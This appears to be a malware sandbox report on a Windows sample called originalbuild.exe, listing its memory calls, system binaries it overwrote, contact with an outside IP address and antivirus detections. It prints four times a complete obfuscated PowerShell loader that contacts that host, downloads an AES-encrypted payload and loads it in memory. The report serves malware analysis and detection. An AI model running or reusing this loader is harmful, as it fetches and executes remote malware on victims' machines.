NtProtectVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ecf1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ecf2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);

cmdline

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 28, 2023, 5:07 p.m.	thread_identifier: 2748 thread_handle: 0x0000037c process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols); filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000384	1	1	0
ShellExecuteExW April 28, 2023, 5:07 p.m.	show_type: 0 filepath_r: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe parameters: -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols); filepath: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0002bc00', u'virtual_address': u'0x0000e000', u'entropy': 7.1709286752938315, u'name': u'.rsrc', u'virtual_size': u'0x0002bb2e'}

entropy

7.17092867529

description

A section with a high entropy has been found

entropy

0.797266514806

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 28, 2023, 5:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

91.215.85.198

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
McAfee	Artemis!9F9583B07CF9
Cylance	unsafe
Sangfor	Trojan.Win32.Agent.Vf3m
CrowdStrike	win/malicious_confidence_70% (D)
K7GW	Trojan ( 0059cfdb1 )
K7AntiVirus	Trojan ( 0059cfdb1 )
BitDefenderTheta	Gen:NN.ZemsilF.36164.om2@aa!kzKg
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Kryptik_AGen.ARG
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	FileRepMalware [Misc]
Sophos	Mal/Generic-S
McAfee-GW-Edition	Artemis!Trojan
Trapmine	malicious.moderate.ml.score
Ikarus	Win32.Outbreak
Microsoft	Trojan:Win32/Wacatac.B!ml
Gridinsoft	Ransom.Win32.Wacatac.sa
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Panda	Trj/Chgt.AD
Rising	Trojan.Kryptik!8.8 (CLOUD)
Fortinet	MSIL/Kryptik_AGen.ARG!tr
AVG	FileRepMalware [Misc]
DeepInstinct	MALICIOUS

originalbuild.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All